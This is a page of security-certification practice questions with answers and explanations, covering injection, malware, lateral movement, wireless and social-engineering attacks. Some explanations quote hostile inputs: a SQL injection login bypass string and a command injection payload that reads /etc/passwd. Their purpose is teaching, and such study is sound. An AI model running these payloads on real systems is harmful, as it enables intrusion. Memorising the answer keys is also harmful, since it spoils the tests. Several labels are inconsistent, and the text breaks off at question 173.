CCNA Threats Vulnerabilities Questions

75 of 265 questions · Page 3/4 · Threats Vulnerabilities topic · Answers revealed

151
MCQeasy

A support portal searches customer records by last name. When a tester enters a single quote into the search field, the application returns a database syntax error. Which attack is most likely possible?

A.SQL injection, because the input may be altering the database query
B.Cross-site scripting, because the page is executing malicious JavaScript in the browser
C.Server-side request forgery, because the server is making internal network calls
D.Cross-site request forgery, because the user is being tricked into submitting a form
AnswerA

A quote causing a database syntax error is a classic sign that user input may be breaking SQL queries.

Why this answer

The single quote character is a common SQL injection test payload. When it triggers a database syntax error, it confirms that the input is being directly concatenated into a SQL query without proper sanitization or parameterization. This allows an attacker to break out of the intended query structure and execute arbitrary SQL commands, making SQL injection the most likely attack.

Exam trap

The trap here is that candidates may confuse a database syntax error with a client-side script error, leading them to choose cross-site scripting, but the error message originates from the database server, not the browser.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) requires the application to reflect or store user input as executable JavaScript in the browser, not cause a server-side database syntax error. Option C is wrong because server-side request forgery (SSRF) involves the server making unintended HTTP requests to internal resources, not manipulating database queries. Option D is wrong because cross-site request forgery (CSRF) tricks an authenticated user into submitting a malicious request, but the error here is a direct database syntax error from input, not a forged request from another site.

152
Multi-Selecthard

A scan returns five findings. Which two should be remediated first based on real-world risk? Select two. A) Internet-facing SSO gateway, CVSS 8.8, public exploit code, and auth bypass impact. B) Internal print server, CVSS 9.8, no known exploit, isolated VLAN, no sensitive data. C) File server with regulated customer records, CVSS 6.5, active exploitation in the wild, reachable from VPN. D) Lab hypervisor, CVSS 7.5, no exploit, scheduled retirement next month, used only by testers. E) Dev wiki, CVSS 5.0, no exploit, no sensitive data.

Select 2 answers
A.Internet-facing SSO gateway with public exploit code and authentication-bypass impact.
B.Internal print server on an isolated VLAN with no known exploit and no sensitive data.
C.File server containing regulated customer records, with active exploitation in the wild and VPN reachability.
D.Lab hypervisor that is scheduled for retirement next month and used only by testers.
E.Development wiki with low severity, no exploit, and no sensitive data.
AnswersA, C

This is a top-priority remediation because the system is internet-facing, has publicly available exploit code, and can lead to authentication bypass. In practice, exposure and exploitability often outweigh CVSS alone because a compromised SSO service can become a foothold for broad lateral movement and account takeover across many systems.

Why this answer

Option A is correct because the SSO gateway is internet-facing, has a CVSS 8.8 with public exploit code, and an authentication-bypass impact. This combination means an attacker can gain unauthorized access to all federated applications without credentials, representing a critical risk that must be remediated immediately.

Exam trap

The trap here is that candidates often prioritize the highest CVSS score (9.8) without considering compensating controls like network isolation, lack of exploit code, or data sensitivity, which can drastically reduce real-world risk.

153
MCQmedium

NetFlow shows one user workstation making authenticated SMB and WinRM connections to more than 40 internal hosts within 15 minutes, starting shortly after the user opened a spreadsheet attachment. No approved admin tool was running on the device. What is the best initial response?

A.Treat the traffic as normal because the workstation used valid credentials
B.Isolate the workstation and begin investigating for credential compromise or lateral movement
C.Increase the DHCP lease time to reduce network noise
D.Block all SMB and WinRM traffic across the entire enterprise
AnswerB

Rapid east-west access from a single workstation is a strong sign of compromise, so containment and investigation should start immediately.

Why this answer

The sudden burst of authenticated SMB and WinRM connections from a single workstation to over 40 internal hosts immediately after opening a spreadsheet attachment is a classic indicator of lateral movement using stolen credentials. Since no approved admin tool was running, this behavior strongly suggests the user's credentials have been compromised, likely via a macro or exploit in the attachment, and an attacker is using those protocols to move laterally. Isolating the workstation stops the attack in progress and preserves evidence for forensic investigation.

Exam trap

The trap here is that candidates see 'authenticated' and assume the traffic is legitimate, missing that attackers use valid stolen credentials to authenticate, making authentication alone an unreliable indicator of safety.

How to eliminate wrong answers

Option A is wrong because valid credentials do not make the traffic normal; attackers commonly use stolen credentials to authenticate and move laterally, so authentication alone does not indicate legitimate activity. Option C is wrong because increasing the DHCP lease time does not address the security incident; it would only extend IP address assignments and has no effect on SMB/WinRM lateral movement. Option D is wrong because blocking all SMB and WinRM traffic enterprise-wide would disrupt legitimate administrative and file-sharing operations, and is an overly broad, reactive measure that does not isolate the specific compromised host or investigate the root cause.

154
MCQmedium

After a routine dependency update, a development team notices that the customer portal begins making outbound connections to an unfamiliar domain during startup. The domain is not part of the application design, and the behavior started immediately after the third-party library was updated. Which threat is most likely?

A.Supply-chain compromise
B.Evil twin access point
C.Bluetooth pairing abuse
D.DNS poisoning on the client network
AnswerA

A compromised dependency can introduce malicious behavior through trusted software updates or packages.

Why this answer

The scenario describes a supply-chain compromise, where a trusted third-party library has been maliciously altered to include unauthorized outbound connections. This is a classic software supply-chain attack, as the dependency update introduced code that phones home to an unfamiliar domain, indicating the library's integrity was compromised before or during distribution.

Exam trap

The trap here is that candidates may confuse supply-chain compromise with DNS poisoning, because both involve unexpected outbound connections, but DNS poisoning would affect all network traffic and not be tied to a specific library update.

How to eliminate wrong answers

Option B (Evil twin access point) is wrong because it involves a rogue Wi-Fi access point impersonating a legitimate one to intercept network traffic, which is unrelated to a dependency update triggering outbound connections. Option C (Bluetooth pairing abuse) is wrong because it exploits Bluetooth vulnerabilities for unauthorized access or data exfiltration, not relevant to a third-party library update causing outbound connections. Option D (DNS poisoning on the client network) is wrong because it corrupts DNS cache to redirect traffic to malicious sites, but the behavior started immediately after the library update and targets a specific domain, not a broad redirection of all traffic.

155
MCQmedium

SIEM alerts show one workstation making SMB connections to 30 internal hosts within 10 minutes, followed by remote service creation and repeated access attempts to admin shares. The workstation also begins authenticating with several privileged accounts. What is the most likely activity?

A.A distributed denial-of-service attack launched from a compromised internal host.
B.DNS tunneling used to exfiltrate data through allowed name-resolution traffic.
C.ARP spoofing to redirect local traffic at the network layer.
D.Lateral movement after credential compromise or endpoint takeover.
AnswerD

The workstation is behaving like an attacker foothold that is probing internal systems, using administrative shares, and attempting remote service creation. Those are strong signs of lateral movement after credentials or the device itself have been compromised. The privileged-account authentication attempts also suggest the attacker is trying to expand access and reach higher-value systems inside the environment.

Why this answer

The sequence of SMB connections to many internal hosts, followed by remote service creation and repeated access attempts to admin shares, combined with authentication using privileged accounts, is the classic pattern of lateral movement. This indicates the attacker has already compromised the workstation (endpoint takeover) or obtained valid credentials and is now using SMB and PsExec-like techniques to move laterally across the network, escalate privileges, and establish persistence.

Exam trap

The trap here is that candidates may confuse lateral movement with a DDoS attack because of the many outbound connections, but the key differentiator is the use of admin shares and privileged account authentication, which are hallmarks of post-exploitation lateral movement, not volumetric attacks.

How to eliminate wrong answers

Option A is wrong because a DDoS attack would generate massive traffic to overwhelm a target, not involve targeted SMB connections to admin shares or privileged account authentication. Option B is wrong because DNS tunneling exfiltrates data by encoding it in DNS queries/responses, not by making SMB connections or creating remote services. Option C is wrong because ARP spoofing operates at Layer 2 to intercept traffic on a local subnet, not to perform SMB-based lateral movement or authenticate with multiple privileged accounts across many hosts.

156
MCQmedium

An EDR console shows `mshta.exe` launching `powershell.exe` from a user profile directory, followed by a script that never writes a new executable to disk. Minutes later, the host begins making regular outbound HTTPS connections to an unfamiliar IP address. What type of malware behavior is most likely being observed?

A.Fileless attack
B.Ransomware
C.Worm
D.Rootkit
AnswerA

Fileless attacks rely on built-in tools and memory-resident activity instead of dropping a traditional executable on disk. The use of mshta and PowerShell is a common indicator.

Why this answer

The EDR console shows mshta.exe (a Microsoft binary for executing HTML Applications) launching PowerShell from a user profile directory, followed by a script that never writes a new executable to disk. This is classic fileless malware behavior, where the malicious payload runs entirely in memory (e.g., via PowerShell or .NET reflection) without dropping a file, making it harder for traditional signature-based antivirus to detect. The subsequent outbound HTTPS connections to an unfamiliar IP indicate command-and-control (C2) communication, consistent with a fileless attack that persists only in memory.

Exam trap

The trap here is that candidates may confuse 'fileless' with 'no malware at all' or think it must involve a rootkit, but the key indicator is the absence of a file write combined with in-memory script execution via trusted system binaries.

How to eliminate wrong answers

Option B (Ransomware) is wrong because ransomware typically encrypts files and demands payment, often writing a ransom note to disk and modifying file extensions; the described behavior of never writing an executable to disk and making outbound HTTPS connections is more indicative of a fileless C2 channel, not encryption or extortion. Option C (Worm) is wrong because worms self-propagate across networks without user interaction, often exploiting vulnerabilities or using removable media; the scenario focuses on a single host's in-memory execution and C2 traffic, not lateral movement or replication. Option D (Rootkit) is wrong because rootkits are designed to hide their presence by modifying the operating system kernel or system calls, often persisting via drivers or bootkits; the described behavior of launching PowerShell from mshta.exe and making outbound connections is a user-mode fileless attack, not a kernel-level stealth mechanism.

157
MCQmedium

A file server suddenly shows renamed files with a new extension, users see a ransom note demanding cryptocurrency, and shadow copies are deleted from the host. Which malware family is the best match?

A.Ransomware, because the attacker is encrypting data and demanding payment to restore access.
B.Trojan, because the attack requires a disguised program to install itself.
C.Spyware, because the attacker is likely trying to monitor file activity.
D.Logic bomb, because the malware likely triggered after a specific condition was met.
AnswerA

Ransomware commonly encrypts files, renames them, deletes recovery points, and leaves a payment demand. The combination of locked data and a ransom note is a strong indicator of this malware family.

Why this answer

Ransomware is the correct classification because the scenario describes file encryption (renamed files with new extensions), a ransom note demanding cryptocurrency, and the deletion of shadow copies (Volume Shadow Copy Service snapshots) to prevent file recovery. These are hallmark behaviors of ransomware, specifically crypto-ransomware, which encrypts data and demands payment for decryption keys.

Exam trap

The trap here is that candidates may confuse ransomware with a Trojan because both can be delivered via social engineering, but the defining behaviors of file encryption, ransom note, and shadow copy deletion are unique to ransomware, not generic malware types.

How to eliminate wrong answers

Option B is wrong because a Trojan is a type of malware that disguises itself as legitimate software to gain access, but it does not inherently perform file encryption or demand ransom; the described behaviors are specific to ransomware, not Trojans. Option C is wrong because spyware is designed to monitor user activity and steal information without the user's knowledge, not to encrypt files or display ransom notes; the deletion of shadow copies and file renaming are not spyware characteristics. Option D is wrong because a logic bomb is a piece of code that executes malicious actions when a specific condition is met (e.g., date or user action), but it does not typically involve file encryption, ransom notes, or cryptocurrency demands; the scenario lacks any trigger condition and instead shows active encryption and extortion.

158
MCQmedium

A web application lets users save a profile "display name." One employee enters a value that contains script code, and later other users who view that profile start seeing pop-ups and redirects to a fake login page. Which attack is most likely occurring?

A.SQL injection, because the database is being queried with unsafe concatenated input.
B.Cross-site scripting, because untrusted content is executed in another user's browser context.
C.Cross-site request forgery, because the attacker is forcing the victim to submit a form automatically.
D.Broken authentication, because the login system is failing to verify usernames correctly.
AnswerB

Cross-site scripting occurs when attacker-supplied input is rendered as active script, allowing redirects, pop-ups, and credential theft in other users' sessions.

Why this answer

Option B is correct because the employee's display name containing script code is stored in the database and later rendered in the browsers of other users without proper sanitization. This is a classic stored cross-site scripting (XSS) attack, where untrusted user input is executed as HTML/JavaScript in the context of another user's session, leading to pop-ups and redirects to a fake login page.

Exam trap

The trap here is that candidates may confuse stored XSS with SQL injection because both involve database storage, but the key distinction is that XSS executes client-side scripts in another user's browser, whereas SQL injection manipulates server-side queries.

How to eliminate wrong answers

Option A is wrong because SQL injection involves manipulating database queries through unsafe concatenation of input, but the described behavior (pop-ups and redirects in other users' browsers) is a client-side script execution, not a server-side database manipulation. Option C is wrong because cross-site request forgery (CSRF) forces a victim to submit a forged request, but the attack here involves script execution in the browser, not unauthorized form submissions. Option D is wrong because broken authentication refers to flaws in login verification or session management, whereas the issue is that untrusted content is executed in the browser, not that authentication is bypassed.

159
MCQmedium

Several employees in a branch office report that their laptops automatically connected to a network named "CorpWiFi" even though they were away from the office. Shortly afterward, a few users saw a captive portal asking them to re-enter company credentials. Which threat best explains this situation?

A.Evil twin access point impersonating the legitimate wireless network
B.Bluetooth pairing abuse from a nearby device
C.DNS poisoning caused by a compromised resolver
D.NFC relay attack against the laptops' login process
AnswerA

An evil twin is a rogue access point configured to look like the trusted wireless network, often using the same or a very similar SSID. Because clients may auto-connect, attackers can capture credentials or inspect traffic through the fake network. The captive portal and automatic connection away from the office strongly suggest a malicious wireless impersonation setup.

Why this answer

The scenario describes an evil twin attack where a rogue access point broadcasts the SSID "CorpWiFi" to trick laptops into automatically connecting. Once connected, the attacker presents a fake captive portal to harvest credentials. This exploits the fact that client devices often prioritize known SSIDs without verifying the authenticity of the access point, relying solely on the network name.

Exam trap

The trap here is that candidates may confuse an evil twin with a rogue AP that requires manual connection, but the key detail is the automatic connection, which exploits the client's saved network profile, not just the presence of a malicious AP.

How to eliminate wrong answers

Option B is wrong because Bluetooth pairing abuse requires active pairing or discovery, not automatic connection to a Wi-Fi network, and does not involve a captive portal for credential harvesting. Option C is wrong because DNS poisoning would redirect traffic to malicious sites after connection, but it does not explain why laptops automatically connected to a network named "CorpWiFi" away from the office. Option D is wrong because NFC relay attacks require physical proximity (typically centimeters) and are used for contactless payment or access card cloning, not for connecting to Wi-Fi networks or presenting a captive portal.

160
MCQeasy

Based on the exhibit, which supply-chain threat is most likely?

A.Dependency compromise
B.Brute-force attack
C.SQL injection
D.Privilege escalation
AnswerA

The application began contacting an unfamiliar domain immediately after a dependency update, and the package came from a newly created repository account. That strongly suggests dependency compromise, a supply-chain issue where a trusted library has been replaced or altered with malicious behavior.

Why this answer

The exhibit shows a dependency on a third-party library (e.g., a JavaScript package from a CDN or a software component from an external repository). A dependency compromise occurs when an attacker injects malicious code into that trusted third-party component, which is then pulled into the organization's environment during updates or builds. This is the most likely supply-chain threat because it directly exploits the trust placed in external dependencies.

Exam trap

Cisco often tests the distinction between supply-chain attacks (compromising a trusted third-party component) and direct attacks on the organization's own systems; the trap here is that candidates may confuse a dependency compromise with a brute-force attack or SQL injection because they all involve unauthorized access, but the key difference is the vector—the dependency is externally sourced and trusted.

How to eliminate wrong answers

Option B (Brute-force attack) is wrong because it targets authentication mechanisms (e.g., SSH, RDP) by guessing credentials, not the integrity of third-party components in the supply chain. Option C (SQL injection) is wrong because it exploits improper input validation in database queries, not the trust relationship with external dependencies. Option D (Privilege escalation) is wrong because it involves gaining elevated access within a system after initial compromise, not the initial infiltration via a compromised dependency.

161
MCQeasy

A development team updates a third-party software library used by its web application. After the release, new deployments begin making unexpected outbound connections to an unfamiliar domain. What type of threat is most likely?

A.Dependency compromise
B.Phishing
C.Rootkit infection
D.Password spraying
AnswerA

Dependency compromise happens when a trusted third-party library, package, or component is altered to include malicious behavior. The unusual outbound connections after an update are a strong sign that the dependency may have been tampered with.

Why this answer

The correct answer is A, dependency compromise. This scenario describes a supply chain attack where a third-party library has been maliciously altered or replaced, causing the web application to make unauthorized outbound connections to an attacker-controlled domain. Such compromises often occur when developers unknowingly integrate a tampered version of a library from a compromised repository or via a typosquatting attack, leading to data exfiltration or command-and-control (C2) communication.

Exam trap

The trap here is that candidates may confuse a dependency compromise with a rootkit infection (Option C) because both involve stealthy, unauthorized behavior, but a rootkit specifically targets the OS kernel, not a web application's third-party library.

How to eliminate wrong answers

Option B is wrong because phishing is a social engineering attack that tricks users into revealing credentials or installing malware via deceptive emails or messages, not a technical compromise of a software library. Option C is wrong because a rootkit infection is a type of malware that hides its presence and provides persistent, stealthy access to an operating system, not a supply chain attack on a web application's dependencies. Option D is wrong because password spraying is a brute-force attack that attempts a few common passwords against many accounts, not a method to alter a third-party library's behavior.

162
MCQmedium

During testing, entering ' OR '1'='1 into a login field returns all user records instead of rejecting the input. What is the best fix to address this flaw?

A.Add client-side JavaScript validation to block quote characters
B.Use parameterized queries or prepared statements for database access
C.Store passwords in a stronger hash format
D.Change the login page to HTTPS
AnswerB

Parameterized queries separate code from data, which prevents SQL injection even when attackers supply special characters.

Why this answer

Option B is correct because the flaw is a classic SQL injection vulnerability, where unsanitized user input is concatenated directly into a SQL query. Parameterized queries (prepared statements) separate SQL logic from data, ensuring that input like ' OR '1'='1 is treated as a literal string value, not executable code. This is the industry-standard mitigation per OWASP and effectively prevents injection attacks.

Exam trap

The trap here is that candidates often confuse input validation (like blocking quotes) with the proper defense of parameterized queries, not realizing that blacklisting characters is ineffective and that the correct fix is to use prepared statements to separate code from data.

How to eliminate wrong answers

Option A is wrong because client-side JavaScript validation can be easily bypassed by disabling JavaScript or using tools like Burp Suite to send raw HTTP requests, so it provides no real security against SQL injection. Option C is wrong because stronger password hashing (e.g., bcrypt, Argon2) addresses credential storage security, not the SQL injection vulnerability that allows an attacker to extract all records without needing passwords. Option D is wrong because HTTPS encrypts data in transit but does not prevent the server from executing malicious SQL commands; the injection occurs after decryption on the server side.

163
MCQmedium

After a new search feature goes live, logs show requests containing `UNION SELECT` and the application returns database error messages. Security testing confirms attackers can retrieve rows from other tables by modifying the query string. Which fix is best?

A.Rewrite the database access layer to use parameterized queries or prepared statements.
B.Encode special characters in the browser before submitting the search form.
C.Disable detailed error messages so attackers cannot see the database name.
D.Increase password complexity requirements for all application users.
AnswerA

Parameterized queries separate user input from SQL code, which prevents attacker-controlled strings from changing the query structure. That directly addresses the injection flaw rather than only hiding symptoms. Because the app is already returning database errors and leaking data, the safest fix is to eliminate dynamic SQL construction at the source of the problem.

Why this answer

The attack described is SQL injection, where the attacker uses `UNION SELECT` to extract data from other tables. The most effective and industry-standard fix is to use parameterized queries or prepared statements, which separate SQL logic from user input, preventing the database from interpreting malicious input as executable code. This directly addresses the root cause by ensuring user-supplied data is treated as data, not as part of the SQL command.

Exam trap

The trap here is that candidates often choose to hide error messages (Option C) thinking it stops the attack, but this only obscures the information leakage without fixing the underlying SQL injection flaw, which can still be exploited via blind techniques.

How to eliminate wrong answers

Option B is wrong because encoding special characters in the browser is a client-side measure that can be easily bypassed by attackers sending raw HTTP requests, and it does not prevent server-side SQL injection. Option C is wrong because disabling detailed error messages only hides the symptoms (e.g., database name exposure) but does not prevent the attacker from exploiting the SQL injection vulnerability; they can still extract data via blind SQL injection techniques. Option D is wrong because increasing password complexity does nothing to address the SQL injection vulnerability in the search feature; it is a security control for authentication, not input validation.

164
Multi-Selectmedium

A security analyst is investigating a potential data exfiltration incident. Which three of the following indicators are most commonly associated with a data exfiltration attack? (Choose three.)

Select 3 answers
.Unusual outbound network traffic, especially during non-business hours
.Multiple failed login attempts from a single user account
.Large volumes of data being transferred to an external IP address
.A sudden increase in DNS queries to a known malicious domain
.A spike in CPU usage on a database server
.An employee receiving a phishing email with a malicious attachment

Why this answer

Unusual outbound network traffic, especially during non-business hours, is a classic indicator of data exfiltration because attackers often schedule transfers when monitoring is less active. Large volumes of data being transferred to an external IP address directly suggests that sensitive data is being moved outside the organization. A sudden increase in DNS queries to a known malicious domain can indicate DNS tunneling, where data is encoded in DNS requests to bypass traditional network controls.

Exam trap

Cisco often tests the distinction between indicators of an active exfiltration event (like data transfer or unusual traffic patterns) and indicators of a precursor attack (like failed logins), so candidates mistakenly select the latter as a direct exfiltration indicator.

165
Multi-Selecthard

A packet capture from a branch office shows the default gateway IP mapped to a MAC address that does not belong to the router. The same suspicious MAC also answers for the DNS server IP, and gratuitous ARP replies appear every 30 seconds. Which two attacks best match this evidence? Select two.

Select 2 answers
A.ARP spoofing or poisoning is occurring on the local network.
B.A man-in-the-middle interception is likely happening between clients and internal services.
C.The network is experiencing a SYN flood against the gateway.
D.An external host is performing broad port scanning on public services.
E.A password-spraying campaign is targeting remote logins.
AnswersA, B

The evidence fits ARP poisoning because an unauthorized MAC address is associating itself with trusted IP addresses such as the gateway and DNS server. Gratuitous ARP replies reinforce the cache manipulation and allow the attacker to redirect traffic at the layer 2 level. This is the classic setup for a local network spoofing attack.

Why this answer

Option A is correct because the evidence shows the default gateway IP is mapped to a MAC address that does not belong to the router, and the same suspicious MAC also answers for the DNS server IP. This is a classic indicator of ARP spoofing or poisoning, where an attacker sends forged ARP replies to associate their MAC address with the IP addresses of critical network devices, such as the gateway and DNS server. Gratuitous ARP replies every 30 seconds further confirm an active ARP poisoning attack, as the attacker repeatedly broadcasts these unsolicited replies to maintain the poisoned ARP cache entries on victim hosts.

Exam trap

The trap here is that candidates may confuse ARP spoofing with a SYN flood or other denial-of-service attacks, failing to recognize that the specific evidence of a mismatched MAC address and gratuitous ARP replies directly points to ARP cache poisoning, not a network-level flood.

166
MCQmedium

Threat intelligence reports that an adversary changes domains daily and uses disposable cloud hosting, but the malware binary hash and a unique mutex name remain unchanged across incidents. Which indicator is the best candidate for immediate detection rule creation?

A.The daily domain names, because they are the easiest items to collect.
B.The malware file hash, because it directly identifies the reused sample.
C.The cloud provider name, because the attacker uses disposable infrastructure.
D.The time of day the campaign was observed, because the attacker is consistent.
AnswerB

The file hash is the strongest immediate IOC here because the same malware sample is being reused across incidents. If the binary remains unchanged, the hash will match exactly and can be used for fast blocking or hunting. Volatile infrastructure such as domains and cloud hosting changes too frequently to serve as the primary detection point.

Why this answer

Option B is correct because the malware file hash (e.g., SHA-256) provides a static, deterministic identifier for the exact binary sample. Since the adversary reuses the same malware binary across incidents, the hash remains unchanged and can be used to create a precise detection rule (e.g., a YARA rule or hash-based IOC blocklist) that will reliably match the malicious file regardless of network-level churn like domain or IP changes.

Exam trap

The trap here is that candidates often choose the 'easiest' or most visible indicator (domain names) without considering stability and false-positive risk, whereas the exam tests the principle that static, unique artifacts (like file hashes) are superior for detection rule creation.

How to eliminate wrong answers

Option A is wrong because daily domain names are highly volatile and ephemeral; they change every 24 hours, making them poor candidates for a stable detection rule and requiring constant updates. Option C is wrong because the cloud provider name (e.g., AWS, Azure, GCP) is a generic attribute shared by millions of legitimate services; using it as a detection indicator would cause massive false positives and does not uniquely identify the adversary's infrastructure. Option D is wrong because the time of day the campaign was observed is not a reliable or unique indicator; attackers can easily shift their activity window, and time-based rules lack specificity and are prone to false positives.

167
MCQmedium

A help desk analyst receives a phone call from someone claiming to be the CFO, who says their phone was lost while traveling and requests an immediate MFA reset and temporary bypass for payroll access. The caller knows the CFO's last name and the company name, but cannot answer the callback verification question. What attack technique is most likely being used?

A.Phishing
B.Vishing
C.Baiting
D.Watering hole attack
AnswerB

Vishing is voice-based social engineering over a phone call. The attacker is using urgency, authority, and a fabricated story to pressure the analyst into changing authentication controls.

Why this answer

The caller is using voice communication to impersonate a high-level executive (CFO) and manipulate the help desk analyst into bypassing security controls, which is the defining characteristic of vishing (voice phishing). The request for an MFA reset and temporary bypass is a social engineering tactic to exploit the analyst's authority bias and urgency, and the inability to pass callback verification confirms the caller is not legitimate.

Exam trap

The trap here is that candidates may confuse vishing with phishing because both involve social engineering, but vishing is specifically voice-based, and the question's context of a phone call and callback verification failure directly points to vishing, not email-based phishing.

How to eliminate wrong answers

Option A (Phishing) is wrong because phishing typically involves deceptive emails, text messages, or websites to steal credentials or deliver malware, not a direct phone call requesting an MFA bypass. Option C (Baiting) is wrong because baiting relies on offering something enticing (e.g., a free USB drive or download) to trick a victim into performing an action, not impersonating an executive over the phone. Option D (Watering hole attack) is wrong because it compromises a website frequently visited by the target group to infect them with malware, not a direct social engineering call to a help desk.

168
MCQmedium

A security analyst is reviewing the results of a dynamic application security test (DAST) on a new e-commerce application. The report indicates that the application's product search functionality is vulnerable to blind SQL injection. The analyst is tasked with recommending a remediation to the development team. The developers currently concatenate user input directly into SQL queries. Which of the following recommendations would most effectively and permanently mitigate this vulnerability?

A.Implement a web application firewall (WAF) rule to block suspicious SQL keywords in search parameters.
B.Sanitize user input by escaping single quotes and other special characters before concatenation.
C.Replace dynamic SQL queries with parameterized prepared statements.
D.Encode all user input using HTML entity encoding before database operations.
AnswerC

Parameterized prepared statements ensure that user input is always treated as data, not executable code. The database compiles the SQL statement with parameter placeholders, and the actual values are bound separately. This completely prevents SQL injection because the input cannot alter the query structure. This is the industry-standard permanent fix.

Why this answer

Option C is correct because parameterized prepared statements separate SQL logic from user input, ensuring that input is always treated as data, not executable code. This permanently prevents SQL injection by design, regardless of the input content, unlike input filtering or WAF rules which can be bypassed.

Exam trap

The trap here is that candidates often choose input sanitization (Option B) because they confuse escaping with proper parameterization, not realizing that escaping is a fragile, context-dependent workaround that fails against advanced injection techniques like time-based blind SQLi or multi-byte character attacks.

How to eliminate wrong answers

Option A is wrong because a WAF rule that blocks suspicious SQL keywords is a reactive, bypassable control; attackers can encode or obfuscate payloads to evade pattern matching. Option B is wrong because escaping special characters is error-prone and insufficient; it does not prevent second-order injection or attacks that exploit character set mismatches. Option D is wrong because HTML entity encoding is designed for output encoding to prevent XSS, not for SQL query construction; it does not alter how the database interprets the input.

169
MCQmedium

A public-facing web service suddenly becomes very slow. NetFlow shows a high volume of small DNS queries leaving attacker-controlled systems and much larger DNS responses arriving at the victim's IP address from many different resolvers. Which attack is taking place?

A.DNS amplification DDoS
B.Replay attack
C.ARP poisoning
D.Session fixation
AnswerA

DNS amplification uses small spoofed queries to elicit much larger responses toward the victim.

Why this answer

This is a DNS amplification DDoS attack. The attacker sends small DNS queries with a spoofed source IP (the victim's IP) to open DNS resolvers, which then send large DNS responses to the victim. The high volume of small queries and much larger responses from many resolvers is the classic signature of an amplification attack, exploiting the UDP protocol's lack of source verification.

Exam trap

The trap here is that candidates may confuse the high volume of DNS traffic with a normal DNS flood or a reflection attack, but the key differentiator is the amplification ratio—small queries generating large responses—which is unique to amplification DDoS, not a simple reflection or volumetric flood.

How to eliminate wrong answers

Option B is wrong because a replay attack involves capturing and retransmitting valid network traffic (e.g., authentication packets) to impersonate a user or gain unauthorized access, not generating high-volume DNS traffic from multiple resolvers. Option C is wrong because ARP poisoning is a local network attack that manipulates ARP tables to intercept traffic on a LAN, not a distributed attack using DNS queries and responses across the internet.

170
MCQeasy

A user's laptop starts renaming many documents, and a ransom note appears on the desktop. What is the best immediate action for the help desk to recommend?

A.Shut down the laptop immediately and leave it on the desk.
B.Disconnect the laptop from the network to contain the infection.
C.Delete the ransom note and continue working until the next reboot.
D.Install a new browser extension to block the attacker.
AnswerB

Removing network access helps prevent the malware from reaching file shares, backup systems, or other hosts while preserving the running state for later analysis.

Why this answer

Disconnecting the laptop from the network immediately stops the ransomware from communicating with its command-and-control (C2) server, preventing further encryption of network shares and lateral movement. This containment step is critical before any remediation, as it isolates the threat and preserves evidence for forensic analysis.

Exam trap

The trap here is that candidates confuse immediate containment with system shutdown, mistakenly believing that powering off stops the attack, when in fact network isolation is the correct first step to halt both encryption and lateral spread.

How to eliminate wrong answers

Option A is wrong because shutting down the laptop may allow the ransomware to complete its encryption process during shutdown and could destroy volatile evidence (e.g., memory-resident encryption keys). Option C is wrong because deleting the ransom note does not stop the encryption process; the ransomware continues to encrypt files in the background, and working normally risks further damage and potential spread to network resources. Option D is wrong because installing a browser extension does not address the active ransomware infection; it is an irrelevant and potentially harmful action that could introduce additional vulnerabilities.

171
MCQmedium

A security analyst receives a phone call from an individual claiming to be a member of the IT help desk. The caller states that an emergency security update requires the analyst's password immediately, and the request sounds urgent. The analyst notices the caller's voice is unfamiliar and the background noise is inconsistent with an office environment. Which type of social engineering attack is being attempted?

A.Phishing
B.Vishing
C.Spear phishing
D.Pretexting
AnswerB

Vishing (voice phishing) is the correct answer because the attack uses a phone call to impersonate a legitimate entity and trick the victim into providing sensitive information, such as a password. The urgency and caller ID spoofing are common vishing tactics.

Why this answer

This is a vishing (voice phishing) attack because the threat actor uses a phone call to impersonate IT help desk personnel and pressures the analyst into disclosing sensitive credentials. Vishing specifically leverages voice communication to bypass email-based security controls and exploit human trust through urgency and authority.

Exam trap

The trap here is that candidates confuse pretexting with vishing, but CompTIA distinguishes vishing as a subtype of social engineering that specifically uses voice technology, whereas pretexting is the broader act of fabricating an identity or scenario regardless of the communication channel.

How to eliminate wrong answers

Option A is wrong because phishing refers to broad, mass-distributed fraudulent emails or messages that trick users into clicking malicious links or attachments, not a direct phone call. Option C is wrong because spear phishing is a targeted email attack customized for a specific individual or organization, using personal details to increase credibility, not a voice call. Option D is wrong because pretexting is a broader social engineering technique where the attacker fabricates a scenario (pretext) to obtain information; while the call involves a pretext, the specific use of voice communication makes vishing the correct classification under the CompTIA SY0-701 framework.

172
MCQmedium

A security analyst is investigating a web application that allows users to input a filename to view its contents. The application passes the user input directly to a system command without sanitization. An attacker submits the input 'file.txt; cat /etc/passwd' and successfully retrieves the contents of the password file. Which type of attack occurred?

A.Cross-site scripting (XSS)
B.SQL injection
C.Command injection
D.Directory traversal
AnswerC

Command injection allows an attacker to execute arbitrary system commands by exploiting unsanitized input passed to system calls. The use of a semicolon to chain commands is a classic indicator of this attack.

Why this answer

The application passes user input directly to a system command without sanitization. The attacker's input 'file.txt; cat /etc/passwd' uses a semicolon to terminate the intended command and execute a second command, which retrieves the password file. This is a classic command injection attack, where arbitrary system commands are executed via the vulnerable interface.

Exam trap

Cisco often tests the distinction between command injection and directory traversal by using a payload that includes both a path and a command separator, leading candidates to mistakenly choose directory traversal when the core exploit is command execution via shell metacharacters.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not executing system commands on the server. Option B is wrong because SQL injection targets database queries by manipulating SQL syntax, not operating system commands. Option D is wrong because directory traversal exploits path manipulation to access files outside the web root, but it does not execute arbitrary system commands; the attack here uses command chaining with a semicolon, not path traversal.

173
MCQeasy

A security team can patch only one system today. Which asset should be remediated first?

A.An internal print server with a high-severity finding and no direct user access
B.A lab workstation with a critical finding and no sensitive data
C.An internet-facing application server with a critical vulnerability and a known exploit
D.A user laptop with a medium-severity issue that requires local access
AnswerC

An internet-facing system with a critical vulnerability and a known exploit has the highest immediate risk. Attackers can reach it easily, and public exploit code increases the chance of compromise, so it should be patched first.

Why this answer

Option C is correct because an internet-facing application server with a critical vulnerability and a known exploit represents the highest risk: it is exposed to external threats, the vulnerability is critical, and a known exploit means attackers can reliably compromise it. Patching this system first reduces the likelihood of a remote breach that could lead to data exfiltration or service disruption, aligning with the principle of prioritizing assets with the greatest attack surface and exploitability.

Exam trap

CompTIA often tests the misconception that the highest CVSS score (critical vs. high/medium) alone dictates remediation priority, but the trap here is that asset exposure and exploitability—specifically an internet-facing server with a known exploit—override internal assets with higher severity but lower risk.

How to eliminate wrong answers

